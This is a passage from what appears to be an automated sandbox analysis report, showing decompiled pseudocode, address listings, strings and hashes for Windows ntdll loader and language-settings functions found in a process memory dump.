																	E012A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E011EFFB0(_t118, _t156, 0x12c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01219A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                      0x011e8799
                                                                      0x011e879d
                                                                      0x011e87a1
                                                                      0x011e87a3
                                                                      0x011e87a8
                                                                      0x011e87c3
                                                                      0x011e87c3
                                                                      0x011e87c8
                                                                      0x011e87d1
                                                                      0x011e87d4
                                                                      0x011e87d8
                                                                      0x011e87e5
                                                                      0x011e87ec
                                                                      0x01239bfe
                                                                      0x01239c00
                                                                      0x01239c02
                                                                      0x01239c08
                                                                      0x01239c0d
                                                                      0x01239c0f
                                                                      0x01239c14
                                                                      0x01239c2d
                                                                      0x01239c32
                                                                      0x01239c37
                                                                      0x01239c3a
                                                                      0x01239c3c
                                                                      0x01239c42
                                                                      0x01239c42
                                                                      0x01239c3c
                                                                      0x01239c02
                                                                      0x011e87da
                                                                      0x011e87df
                                                                      0x011e87e3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e87e3
                                                                      0x011e87f2
                                                                      0x00000000
                                                                      0x011e87fb
                                                                      0x011e87fd
                                                                      0x011e87fe
                                                                      0x011e880e
                                                                      0x011e880f
                                                                      0x011e8810
                                                                      0x011e8814
                                                                      0x011e881a
                                                                      0x011e881c
                                                                      0x011e881f
                                                                      0x011e8821
                                                                      0x011e8822
                                                                      0x011e8824
                                                                      0x011e8826
                                                                      0x011e882c
                                                                      0x011e882e
                                                                      0x01239c48
                                                                      0x01239c48
                                                                      0x011e8834
                                                                      0x011e8834
                                                                      0x011e8837
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e8837
                                                                      0x011e882e
                                                                      0x011e883d
                                                                      0x011e8840
                                                                      0x011e8843
                                                                      0x011e8846
                                                                      0x011e8849
                                                                      0x011e884c
                                                                      0x011e884e
                                                                      0x011e8850
                                                                      0x011e8852
                                                                      0x011e8854
                                                                      0x011e8857
                                                                      0x011e88b4
                                                                      0x011e88b6
                                                                      0x011e88b6
                                                                      0x011e8859
                                                                      0x011e8859
                                                                      0x011e8859
                                                                      0x011e8861
                                                                      0x011e8866
                                                                      0x011e886a
                                                                      0x011e893d
                                                                      0x011e8941
                                                                      0x00000000
                                                                      0x011e8947
                                                                      0x011e8947
                                                                      0x011e894a
                                                                      0x011e894c
                                                                      0x00000000
                                                                      0x011e8952
                                                                      0x011e8955
                                                                      0x011e895a
                                                                      0x011e895d
                                                                      0x011e895d
                                                                      0x011e895f
                                                                      0x011e8961
                                                                      0x011e8961
                                                                      0x011e8968
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e896a
                                                                      0x011e896b
                                                                      0x011e896e
                                                                      0x00000000
                                                                      0x011e8970
                                                                      0x011e8970
                                                                      0x011e8970
                                                                      0x011e8970
                                                                      0x011e8972
                                                                      0x011e8972
                                                                      0x011e8974
                                                                      0x00000000
                                                                      0x011e897a
                                                                      0x011e897a
                                                                      0x011e897d
                                                                      0x00000000
                                                                      0x011e8983
                                                                      0x01239c65
                                                                      0x01239c6d
                                                                      0x01239c72
                                                                      0x01239c75
                                                                      0x01239c75
                                                                      0x01239c82
                                                                      0x01239c86
                                                                      0x01239c87
                                                                      0x01239c88
                                                                      0x01239c89
                                                                      0x01239c8c
                                                                      0x01239c90
                                                                      0x01239c95
                                                                      0x01239c97
                                                                      0x01239ca0
                                                                      0x01239ca3
                                                                      0x01239ca9
                                                                      0x01239ca9
                                                                      0x00000000
                                                                      0x01239ca9
                                                                      0x01239ca3
                                                                      0x00000000
                                                                      0x01239c97
                                                                      0x011e897d
                                                                      0x00000000
                                                                      0x011e8974
                                                                      0x011e8988
                                                                      0x011e8992
                                                                      0x011e8996
                                                                      0x00000000
                                                                      0x011e8996
                                                                      0x011e894c
                                                                      0x00000000
                                                                      0x011e8870
                                                                      0x011e887b
                                                                      0x011e887d
                                                                      0x011e887f
                                                                      0x011e8881
                                                                      0x011e8884
                                                                      0x011e8884
                                                                      0x011e8886
                                                                      0x011e8889
                                                                      0x011e888c
                                                                      0x011e888e
                                                                      0x011e8891
                                                                      0x011e8891
                                                                      0x011e8898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e889a
                                                                      0x011e889b
                                                                      0x011e889e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e88a0
                                                                      0x011e88a8
                                                                      0x011e88b0
                                                                      0x011e88b2
                                                                      0x011e88d3
                                                                      0x011e88d5
                                                                      0x00000000
                                                                      0x011e88d7
                                                                      0x011e88db
                                                                      0x011e88dc
                                                                      0x011e88e0
                                                                      0x011e88e8
                                                                      0x011e88ee
                                                                      0x011e88f0
                                                                      0x011e88f3
                                                                      0x011e88fc
                                                                      0x011e8901
                                                                      0x011e8906
                                                                      0x011e890c
                                                                      0x011e890c
                                                                      0x011e890f
                                                                      0x011e8916
                                                                      0x011e8917
                                                                      0x011e8918
                                                                      0x011e8919
                                                                      0x011e891a
                                                                      0x011e891f
                                                                      0x011e8921
                                                                      0x01239c52
                                                                      0x01239c55
                                                                      0x01239c5b
                                                                      0x01239cac
                                                                      0x01239cc0
                                                                      0x01239cc0
                                                                      0x01239c55
                                                                      0x011e8927
                                                                      0x011e8927
                                                                      0x011e892f
                                                                      0x011e8933
                                                                      0x00000000
                                                                      0x011e88f5
                                                                      0x011e88f5
                                                                      0x00000000
                                                                      0x011e88f7
                                                                      0x011e88f7
                                                                      0x011e88fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e88fa
                                                                      0x011e88f5
                                                                      0x011e88f3
                                                                      0x00000000
                                                                      0x011e88d5
                                                                      0x00000000
                                                                      0x011e88b2
                                                                      0x011e88c9
                                                                      0x00000000
                                                                      0x011e88c9
                                                                      0x011e887f
                                                                      0x011e886a
                                                                      0x011e8857
                                                                      0x011e8852
                                                                      0x011e88bf
                                                                      0x011e88bf
                                                                      0x011e87aa
                                                                      0x011e87ad
                                                                      0x011e87ae
                                                                      0x011e87b4
                                                                      0x011e87b5
                                                                      0x011e87b6
                                                                      0x011e87b8
                                                                      0x011e87bd
                                                                      0x011e87c1
                                                                      0x011e87f4
                                                                      0x011e87fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e87c1
                                                                      0x00000000

                                                                      Strings
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01239C18
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01239C28
                                                                      • LdrpDoPostSnapWork, xrefs: 01239C1E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 0d0c5be525874d690216c367163dafd8ccbc4403de5246a65aa4c4ca0b08e2f7
                                                                      • Instruction ID: 821edf20ce3074a4b10890345b7897b0ac79bde1c73e26c8d7f93be613676322
                                                                      • Opcode Fuzzy Hash: 0d0c5be525874d690216c367163dafd8ccbc4403de5246a65aa4c4ca0b08e2f7
                                                                      • Instruction Fuzzy Hash: D7911271A10A069FEF1CDF99D488ABAB7F5FF85314B054169EE01AB240EB70ED41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E011E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E011ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E011DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x12c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01255510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x12c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E011F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E011F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01257016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E011F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E011F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01257016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0120A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E011DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                      0x011e7e4c
                                                                      0x011e7e50
                                                                      0x011e7e55
                                                                      0x011e7e58
                                                                      0x011e7e5d
                                                                      0x011e7e71
                                                                      0x011e7f33
                                                                      0x011e7e77
                                                                      0x011e7e77
                                                                      0x011e7e79
                                                                      0x011e7e79
                                                                      0x011e7e7e
                                                                      0x011e7f45
                                                                      0x01239848
                                                                      0x00000000
                                                                      0x01239848
                                                                      0x011e7f4e
                                                                      0x011e7f53
                                                                      0x011e7f5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0123985a
                                                                      0x01239862
                                                                      0x01239866
                                                                      0x00000000
                                                                      0x0123986c
                                                                      0x00000000
                                                                      0x0123986c
                                                                      0x011e7e84
                                                                      0x011e7e84
                                                                      0x011e7e8d
                                                                      0x01239871
                                                                      0x011e7eb8
                                                                      0x011e7ec0
                                                                      0x011e7ec0
                                                                      0x011e7e9a
                                                                      0x0123987e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01239884
                                                                      0x0123988b
                                                                      0x012398a7
                                                                      0x012398ac
                                                                      0x012398b1
                                                                      0x012398b6
                                                                      0x012398b8
                                                                      0x012398b8
                                                                      0x012398b9
                                                                      0x00000000
                                                                      0x012398b9
                                                                      0x011e7ea0
                                                                      0x011e7ea7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e7eac
                                                                      0x011e7eb1
                                                                      0x011e7ec6
                                                                      0x011e7ed0
                                                                      0x012398cc
                                                                      0x011e7ed6
                                                                      0x011e7ed6
                                                                      0x011e7ed6
                                                                      0x011e7ede
                                                                      0x011e7ee3
                                                                      0x012398e3
                                                                      0x012398f0
                                                                      0x01239902
                                                                      0x012398f2
                                                                      0x012398fb
                                                                      0x012398fb
                                                                      0x01239907
                                                                      0x0123991d
                                                                      0x0123991d
                                                                      0x01239907
                                                                      0x012398e3
                                                                      0x011e7ef0
                                                                      0x011e7f14
                                                                      0x011e7f14
                                                                      0x011e7f1e
                                                                      0x01239946
                                                                      0x011e7f24
                                                                      0x011e7f24
                                                                      0x011e7f24
                                                                      0x011e7f2c
                                                                      0x0123996a
                                                                      0x01239975
                                                                      0x01239975
                                                                      0x0123997e
                                                                      0x01239993
                                                                      0x01239993
                                                                      0x0123997e
                                                                      0x00000000
                                                                      0x011e7ef2
                                                                      0x011e7efc
                                                                      0x011e7f0a
                                                                      0x011e7f0e
                                                                      0x01239933
                                                                      0x00000000
                                                                      0x01239933
                                                                      0x00000000
                                                                      0x011e7f0e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011e7eb1

                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 012398A2
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01239891
                                                                      • LdrpCompleteMapModule, xrefs: 01239898
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: f710882251b5c913e253e183791a14eda30f4be4dfe5209261f6f3ead0adc2fd
                                                                      • Instruction ID: 75196112ed11bae53651e483b6938b58cc1b41a753a837f4fb520b4b9be3889c
                                                                      • Opcode Fuzzy Hash: f710882251b5c913e253e183791a14eda30f4be4dfe5209261f6f3ead0adc2fd
                                                                      • Instruction Fuzzy Hash: 8451F371604B469BFB29CBACC988B6A7BE4AB81318F040559EA529B3D1D770ED40C7D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011DE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E011DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E011DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012195D0();
						}
						if(_t78 != 0) {
							L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0121FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0121BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01219600();
					if(_t97 < 0) {
						goto L6;
					}
					E0121BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L011DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0121BB40(_t83, _t102 + 0x24, _t78);
								if(L011E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0121BB40(_t84, _t102 + 0x24, _t94);
									if(L011E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                      0x011de620
                                                                      0x011de628
                                                                      0x011de62f
                                                                      0x011de631
                                                                      0x011de635
                                                                      0x011de637
                                                                      0x011de63e
                                                                      0x01235503
                                                                      0x01235503
                                                                      0x011de64c
                                                                      0x011de64c
                                                                      0x011de651
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011de661
                                                                      0x011de665
                                                                      0x0123542a
                                                                      0x011de715
                                                                      0x011de71a
                                                                      0x011de71c
                                                                      0x011de720
                                                                      0x011de720
                                                                      0x011de727
                                                                      0x011de736
                                                                      0x011de736
                                                                      0x011de743
                                                                      0x011de743
                                                                      0x011de673
                                                                      0x011de678
                                                                      0x011de67d
                                                                      0x011de682
                                                                      0x011de685
                                                                      0x011de692
                                                                      0x011de69b
                                                                      0x011de6a3
                                                                      0x011de6ad
                                                                      0x011de6b1
                                                                      0x011de6b2
                                                                      0x011de6bb
                                                                      0x011de6bf
                                                                      0x011de6c0
                                                                      0x011de6c8
                                                                      0x011de6cc
                                                                      0x011de6d5
                                                                      0x011de6d9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011de6e5
                                                                      0x011de6ea
                                                                      0x011de6f9
                                                                      0x011de70b
                                                                      0x011de70f
                                                                      0x01235439
                                                                      0x0123545e
                                                                      0x0123545e
                                                                      0x00000000
                                                                      0x0123545e
                                                                      0x0123543b
                                                                      0x0123543e
                                                                      0x01235440
                                                                      0x01235445
                                                                      0x01235472
                                                                      0x01235475
                                                                      0x0123548d
                                                                      0x01235493
                                                                      0x012354a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x012354ab
                                                                      0x012354b4
                                                                      0x012354bc
                                                                      0x012354c8
                                                                      0x012354de
                                                                      0x012354fb
                                                                      0x012354e0
                                                                      0x012354e6
                                                                      0x012354eb
                                                                      0x012354eb
                                                                      0x012354de
                                                                      0x00000000
                                                                      0x012354bc
                                                                      0x01235477
                                                                      0x0123547a
                                                                      0x01235480
                                                                      0x01235483
                                                                      0x01235486
                                                                      0x0123548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0123548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01235447
                                                                      0x01235447
                                                                      0x01235447
                                                                      0x01235447
                                                                      0x0123544e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01235450
                                                                      0x01235452
                                                                      0x01235455
                                                                      0x0123545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0123545c
                                                                      0x0123546a
                                                                      0x0123546d
                                                                      0x0123546f
                                                                      0x00000000
                                                                      0x0123546f
                                                                      0x011de70f

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 011DE68C
                                                                      • InstallLanguageFallback, xrefs: 011DE6DB
                                                                      • @, xrefs: 011DE6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: 8d0102faa908e2528d0c6f33091461f41f23bb4743b7edbaf67001fe95cfdde8
                                                                      • Instruction ID: d59cdc5464308eba60d88ccc541e183b14405df838e9b98a58faf03f11f6118b
                                                                      • Opcode Fuzzy Hash: 8d0102faa908e2528d0c6f33091461f41f23bb4743b7edbaf67001fe95cfdde8
                                                                      • Instruction Fuzzy Hash: 695192B26193469BD718DF68C440A7BB7E8FF98615F05092EFA89D7240F734DA04C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0129E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction ID: 7d797ed86f0c0ed04272f4b3b049947d1eb6842ff51f196e0a6d15023ebea63c
                                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction Fuzzy Hash: F291A1712243429FEB24CE2DC841B6BBBE5BF84714F15892DF695CB290E774E904CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: a800e0e3f30f356f832a93a3847c9549bf2704fdc0362e9ec6f77af5a268d802
                                                                      • Instruction ID: 7dd9776dfd2498ec2ff563bc87b5d9cf4867e84ec12d13b84e4e491fb1cc5338
                                                                      • Opcode Fuzzy Hash: a800e0e3f30f356f832a93a3847c9549bf2704fdc0362e9ec6f77af5a268d802
                                                                      • Instruction Fuzzy Hash: 47516E71A20609AFDB64DFA8C980BADBBF8FF58740F14402DEA49EB252D7719940CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011FB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011FB9A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: e8c73ca1f1780d4a5f418fb4e40d43db6b4da796fca72f86ce31c7e1ee44cb1e
                                                                      • Instruction ID: cf702ffd9629a6a520727a302acc40ea22c410af90cc37d147d102277e2971a6
                                                                      • Opcode Fuzzy Hash: e8c73ca1f1780d4a5f418fb4e40d43db6b4da796fca72f86ce31c7e1ee44cb1e
                                                                      • Instruction Fuzzy Hash: 43516AB1A18341CFC728CF2DC08092ABBF5FB88614F55896EF69587355D730E844CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011DB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: f3dc37c5d8f25abb0cc57008a6091a07b57678c30d9a87b5fc28b3acf7752039
                                                                      • Instruction ID: 8c26ea5622c2ec3a46c03e8f8680cf8bd5b5625c2bbff1fca018bec89a48173a
                                                                      • Opcode Fuzzy Hash: f3dc37c5d8f25abb0cc57008a6091a07b57678c30d9a87b5fc28b3acf7752039
                                                                      • Instruction Fuzzy Hash: C85103B1D2029A8EDF35EF68C844BBEBBB0BF80710F1141EDD959AB282D7704941CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01202581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 3b66750b7a5c33fd625d672c0941383f374be2ea32f1d439f1278259554f6ffa
                                                                      • Instruction ID: d2a9d0095752b7f223dadc107f3d231dd5bc132ba5f432e0aa0dda8f6f6f3a04
                                                                      • Opcode Fuzzy Hash: 3b66750b7a5c33fd625d672c0941383f374be2ea32f1d439f1278259554f6ffa
                                                                      • Instruction Fuzzy Hash: 09C1D471D2021ADFDB2ADF98D885BBDBBB5FF48700F14412AE601B7291E774A941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0124BE0F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: 4b585427644944aebce0707fbbf77927554a468bf6b554f580ee719a859469b3
                                                                      • Instruction ID: 4437af713ef138d21983edd9dc7ba1f37679ca53d8a7edc2477400dc5c5a5c84
                                                                      • Opcode Fuzzy Hash: 4b585427644944aebce0707fbbf77927554a468bf6b554f580ee719a859469b3
                                                                      • Instruction Fuzzy Hash: DBA11931B60A07CBE73ACB68C55577AB7A5AF48714F044669EA46CB6C2EB70D841CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011D2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
